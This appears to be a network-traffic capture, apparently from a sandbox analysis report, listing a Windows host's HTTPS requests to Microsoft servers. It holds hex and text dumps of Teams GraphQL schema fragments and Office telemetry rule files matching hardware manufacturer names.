                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC8192INData Raw: 53 65 72 76 69 63 65 4d 65 65 74 69 6e 67 45 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 44 61 74 61 54 79 70 65 3a 5b 32 2c 7b 6b 65 79 3a 31 2c 76 61 6c 75 65 3a 31 7d 5d 2c 53 63 68 65 64 75 6c 69 6e 67 53 65 72 76 69 63 65 4d 65 65 74 69 6e 67 45 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 44 61 74 61 49 6e 70 75 74 3a 5b 36 2c 7b 6b 65 79 3a 31 2c 76 61 6c 75 65 3a 31 7d 5d 2c 53 63 68 65 64 75 6c 69 6e 67 53 65 72 76 69 63 65 4d 65 65 74 69 6e 67 45 76 65 6e 74 49 6e 70 75 74 3a 5b 36 2c 7b 67 72 6f 75 70 43 6f 6e 74 65 78 74 3a 22 53 63 68 65 64 75 6c 69 6e 67 53 65 72 76 69 63 65 43 68 61 74 43 6f 6e 74 65 78 74 49 6e 70 75 74 21 22 2c 65 74 61 67 3a 36 2c 6d 65 65 74 69 6e 67 55 72 6c 3a 36 2c 6c 69 6e 6b 73 3a 22 53 63 68 65 64 75 6c 69 6e 67 53 65 72 76
                                                                                                                                                                                                                                                                            Data Ascii: ServiceMeetingEventExtensionDataType:[2,{key:1,value:1}],SchedulingServiceMeetingEventExtensionDataInput:[6,{key:1,value:1}],SchedulingServiceMeetingEventInput:[6,{groupContext:"SchedulingServiceChatContextInput!",etag:6,meetingUrl:6,links:"SchedulingServ
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC103INData Raw: 64 64 79 43 6f 6e 74 61 63 74 21 5d 22 2c 64 65 6c 65 74 65 64 43 6f 6e 74 61 63 74 73 3a 22 5b 42 75 64 64 79 43 6f 6e 74 61 63 74 21 5d 22 7d 5d 2c 42 75 64 64 79 47 72 6f 75 70 73 43 68 61 6e 67 65 64 45 76 65 6e 74 3a 5b 32 2c 7b 62 75 64 64 79 47 72 6f 75 70 3a 22 42 75 64 64 79 47 72 6f 75 70 22 2c 64
                                                                                                                                                                                                                                                                            Data Ascii: ddyContact!]",deletedContacts:"[BuddyContact!]"}],BuddyGroupsChangedEvent:[2,{buddyGroup:"BuddyGroup",d
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC8192INData Raw: 65 6c 65 74 65 64 47 72 6f 75 70 3a 22 42 75 64 64 79 47 72 6f 75 70 22 7d 5d 2c 44 65 6c 65 67 61 74 65 53 65 74 74 69 6e 67 73 43 68 61 6e 67 65 64 45 76 65 6e 74 3a 5b 32 2c 7b 64 65 6c 65 67 61 74 65 53 65 74 74 69 6e 67 73 3a 22 44 65 6c 65 67 61 74 65 53 65 74 74 69 6e 67 73 21 22 7d 5d 2c 73 6c 61 43 61 6c 6c 73 43 68 61 6e 67 65 64 45 76 65 6e 74 3a 5b 32 2c 7b 73 6c 61 43 61 6c 6c 73 3a 22 5b 53 68 61 72 65 64 4c 69 6e 65 41 63 74 69 76 65 43 61 6c 6c 49 6e 66 6f 21 5d 21 22 7d 5d 2c 4f 6e 67 6f 69 6e 67 43 6f 6e 73 75 6c 74 61 74 69 6f 6e 3a 5b 32 2c 7b 63 6f 6e 76 65 72 73 61 74 69 6f 6e 49 64 3a 31 30 2c 69 73 43 6f 6e 73 75 6c 74 3a 37 2c 63 6f 6e 73 75 6c 74 43 6f 6e 74 65 78 74 3a 22 43 6f 6e 73 75 6c 74 43 6f 6e 74 65 78 74 22 7d 5d 2c 56
                                                                                                                                                                                                                                                                            Data Ascii: eletedGroup:"BuddyGroup"}],DelegateSettingsChangedEvent:[2,{delegateSettings:"DelegateSettings!"}],slaCallsChangedEvent:[2,{slaCalls:"[SharedLineActiveCallInfo!]!"}],OngoingConsultation:[2,{conversationId:10,isConsult:7,consultContext:"ConsultContext"}],V
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC8192INData Raw: 65 63 74 65 64 49 6e 74 65 72 70 72 65 74 61 74 69 6f 6e 47 72 6f 75 70 3a 5b 36 2c 7b 69 64 3a 31 2c 6c 61 62 65 6c 3a 31 7d 5d 2c 44 65 76 69 63 65 73 4d 65 65 74 69 6e 67 54 79 70 65 3a 5b 35 2c 5b 22 55 6e 6b 6e 6f 77 6e 22 2c 22 54 65 61 6d 73 22 2c 22 53 6b 79 70 65 22 2c 22 57 65 62 65 78 22 2c 22 5a 6f 6f 6d 22 2c 22 42 6c 75 65 4a 65 61 6e 73 22 2c 22 47 6f 54 6f 22 5d 5d 2c 44 65 76 69 63 65 73 4d 65 65 74 69 6e 67 4d 65 74 61 64 61 74 61 49 6e 70 75 74 3a 5b 36 2c 7b 73 75 62 6a 65 63 74 3a 31 2c 6f 72 67 61 6e 69 7a 65 72 4e 61 6d 65 3a 31 2c 73 74 61 72 74 54 69 6d 65 3a 22 44 61 74 65 54 69 6d 65 22 2c 65 6e 64 54 69 6d 65 3a 22 44 61 74 65 54 69 6d 65 22 2c 69 73 50 72 69 76 61 74 65 3a 32 2c 6d 65 65 74 69 6e 67 49 64 3a 31 2c 74 68 72 65
                                                                                                                                                                                                                                                                            Data Ascii: ectedInterpretationGroup:[6,{id:1,label:1}],DevicesMeetingType:[5,["Unknown","Teams","Skype","Webex","Zoom","BlueJeans","GoTo"]],DevicesMeetingMetadataInput:[6,{subject:1,organizerName:1,startTime:"DateTime",endTime:"DateTime",isPrivate:2,meetingId:1,thre
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC8192INData Raw: 72 65 61 74 65 4d 65 65 74 69 6e 67 4e 6f 74 65 73 3a 5b 22 4d 65 65 74 69 6e 67 4e 6f 74 65 73 4c 69 6e 6b 21 22 2c 7b 74 65 61 6d 73 43 61 6c 6c 49 64 3a 31 30 7d 5d 2c 61 63 63 65 70 74 42 6c 6f 63 6b 53 66 43 43 68 61 74 3a 5b 32 2c 7b 63 6f 6e 76 49 64 3a 31 30 2c 61 63 74 69 6f 6e 3a 22 43 6f 6e 74 61 63 74 41 63 63 65 70 74 4f 72 42 6c 6f 63 6b 41 63 74 69 6f 6e 21 22 2c 63 61 6c 6c 65 72 49 6e 66 6f 3a 36 7d 5d 2c 63 6f 6e 74 61 63 74 41 63 63 65 70 74 4f 72 42 6c 6f 63 6b 45 78 74 65 6e 64 65 64 3a 5b 22 42 6c 6f 63 6b 65 64 43 6f 6e 74 61 63 74 55 70 64 61 74 65 45 78 74 65 6e 64 65 64 21 22 2c 7b 63 6f 6e 76 49 64 3a 31 30 2c 61 63 74 69 6f 6e 3a 22 43 6f 6e 74 61 63 74 41 63 63 65 70 74 4f 72 42 6c 6f 63 6b 41 63 74 69 6f 6e 21 22 2c 63 61 6c
                                                                                                                                                                                                                                                                            Data Ascii: reateMeetingNotes:["MeetingNotesLink!",{teamsCallId:10}],acceptBlockSfCChat:[2,{convId:10,action:"ContactAcceptOrBlockAction!",callerInfo:6}],contactAcceptOrBlockExtended:["BlockedContactUpdateExtended!",{convId:10,action:"ContactAcceptOrBlockAction!",cal
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC102INData Raw: 6d 65 64 3a 32 2c 63 6c 6f 75 64 54 79 70 65 3a 31 2c 72 65 64 65 65 6d 55 72 6c 3a 31 2c 69 73 54 65 6e 61 6e 74 48 69 64 64 65 6e 3a 32 2c 75 73 65 72 54 65 6e 61 6e 74 53 74 61 74 65 3a 31 2c 74 65 6e 61 6e 74 52 65 6c 61 74 69 6f 6e 73 68 69 70 3a 31 7d 5d 2c 54 65 6e 61 6e 74 44 61 74 61 55 70 64 61
                                                                                                                                                                                                                                                                            Data Ascii: med:2,cloudType:1,redeemUrl:1,isTenantHidden:2,userTenantState:1,tenantRelationship:1}],TenantDataUpda
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC8192INData Raw: 74 65 45 76 65 6e 74 3a 5b 32 2c 7b 61 63 63 6f 75 6e 74 49 64 3a 31 2c 74 65 6e 61 6e 74 3a 22 54 65 6e 61 6e 74 44 61 74 61 22 2c 69 73 54 65 6e 61 6e 74 44 65 6c 65 74 65 64 3a 32 7d 5d 2c 50 74 7a 50 61 72 74 69 63 69 70 61 6e 74 3a 5b 32 2c 7b 69 64 3a 31 30 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 31 2c 61 63 74 69 76 65 3a 32 7d 5d 2c 50 74 7a 43 61 70 61 62 6c 65 50 61 72 74 69 63 69 70 61 6e 74 73 3a 5b 32 2c 7b 70 61 72 74 69 63 69 70 61 6e 74 73 3a 22 5b 50 74 7a 50 61 72 74 69 63 69 70 61 6e 74 21 5d 22 7d 5d 2c 43 6f 6e 74 65 6e 74 53 68 61 72 69 6e 67 53 65 73 73 69 6f 6e 3a 5b 34 2c 5b 22 50 70 74 53 68 61 72 69 6e 67 53 65 73 73 69 6f 6e 22 2c 22 57 68 69 74 65 62 6f 61 72 64 53 68 61 72 69 6e 67 53 65 73 73 69 6f 6e 22 5d 5d 2c 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: teEvent:[2,{accountId:1,tenant:"TenantData",isTenantDeleted:2}],PtzParticipant:[2,{id:10,displayName:1,active:2}],PtzCapableParticipants:[2,{participants:"[PtzParticipant!]"}],ContentSharingSession:[4,["PptSharingSession","WhiteboardSharingSession"]],Cont
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC8192INData Raw: 44 61 74 65 54 69 6d 65 55 74 63 3a 22 44 61 74 65 54 69 6d 65 21 22 2c 74 72 61 6e 73 63 72 69 70 74 43 6f 6e 66 69 64 65 6e 63 65 3a 39 2c 64 69 73 70 6c 61 79 43 6c 65 61 6e 43 6f 6e 74 65 6e 74 3a 31 2c 75 74 74 65 72 61 6e 63 65 49 6e 64 65 78 3a 33 7d 5d 2c 49 6e 64 69 63 65 73 49 6e 70 75 74 3a 5b 36 2c 7b 6f 66 66 73 65 74 3a 33 2c 6c 65 6e 67 74 68 3a 33 7d 5d 2c 41 63 74 69 6f 6e 49 74 65 6d 4f 77 6e 65 72 49 6e 70 75 74 3a 5b 36 2c 7b 75 73 65 72 3a 22 55 73 65 72 46 75 6c 6c 49 6e 70 75 74 21 22 2c 6f 77 6e 65 72 73 68 69 70 54 79 70 65 3a 22 41 63 74 69 6f 6e 49 74 65 6d 4f 77 6e 65 72 73 68 69 70 54 79 70 65 21 22 7d 5d 2c 41 63 74 69 6f 6e 49 74 65 6d 49 6e 70 75 74 3a 5b 36 2c 7b 69 64 3a 31 30 2c 63 61 6c 6c 49 64 3a 31 2c 61 72 74 69 66
                                                                                                                                                                                                                                                                            Data Ascii: DateTimeUtc:"DateTime!",transcriptConfidence:9,displayCleanContent:1,utteranceIndex:3}],IndicesInput:[6,{offset:3,length:3}],ActionItemOwnerInput:[6,{user:"UserFullInput!",ownershipType:"ActionItemOwnershipType!"}],ActionItemInput:[6,{id:10,callId:1,artif
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC8192INData Raw: 6e 66 6f 3a 5b 32 2c 7b 69 64 3a 31 30 7d 5d 2c 4d 65 65 74 69 6e 67 42 72 61 6e 64 69 6e 67 49 6e 66 6f 3a 5b 32 2c 7b 64 65 66 61 75 6c 74 54 68 65 6d 65 3a 31 2c 6d 65 65 74 69 6e 67 42 72 61 6e 64 69 6e 67 54 68 65 6d 65 73 3a 22 5b 4d 65 65 74 69 6e 67 42 72 61 6e 64 69 6e 67 54 68 65 6d 65 21 5d 22 2c 6c 6f 62 62 79 4c 6f 67 6f 42 72 61 6e 64 69 6e 67 49 6d 61 67 65 73 3a 22 5b 4c 6f 62 62 79 4c 6f 67 6f 42 72 61 6e 64 69 6e 67 49 6d 61 67 65 21 5d 22 7d 5d 2c 4c 6f 62 62 79 4c 6f 67 6f 42 72 61 6e 64 69 6e 67 49 6d 61 67 65 3a 5b 32 2c 7b 69 6d 61 67 65 55 72 69 3a 36 7d 5d 2c 4d 65 65 74 69 6e 67 42 72 61 6e 64 69 6e 67 54 68 65 6d 65 3a 5b 32 2c 7b 69 64 65 6e 74 69 74 79 3a 35 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 31 2c 65 6e 61 62 6c 65 64 3a
                                                                                                                                                                                                                                                                            Data Ascii: nfo:[2,{id:10}],MeetingBrandingInfo:[2,{defaultTheme:1,meetingBrandingThemes:"[MeetingBrandingTheme!]",lobbyLogoBrandingImages:"[LobbyLogoBrandingImage!]"}],LobbyLogoBrandingImage:[2,{imageUri:6}],MeetingBrandingTheme:[2,{identity:5,displayName:1,enabled:


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            50192.168.2.44991413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:41 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                            x-ms-request-id: 41e0821a-f01e-001f-65ee-445dc8000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175941Z-174f7845968zgtf6hC1EWRqd8s0000000z6g00000000gtuz
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            51192.168.2.44991513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:41 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                            x-ms-request-id: 54795c3a-901e-0064-35fd-44e8a6000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175941Z-174f7845968cs2nkhC1EWR2tq000000001zg0000000096a3
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            52192.168.2.44991613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:41 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                            x-ms-request-id: 25c4f972-a01e-0021-6cb8-42814c000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175941Z-174f78459688l8rvhC1EWRtzr00000000kv000000000fwkb
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            53192.168.2.44991813.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:41 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                            x-ms-request-id: d81e2dc6-501e-000a-4705-410180000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175941Z-174f7845968pght8hC1EWRyvxg00000009h000000000004g
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:42 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            54192.168.2.44991913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:41 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:42 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                            x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175942Z-174f78459688l8rvhC1EWRtzr00000000kxg00000000729u
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:42 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            55192.168.2.44993113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:43 GMT
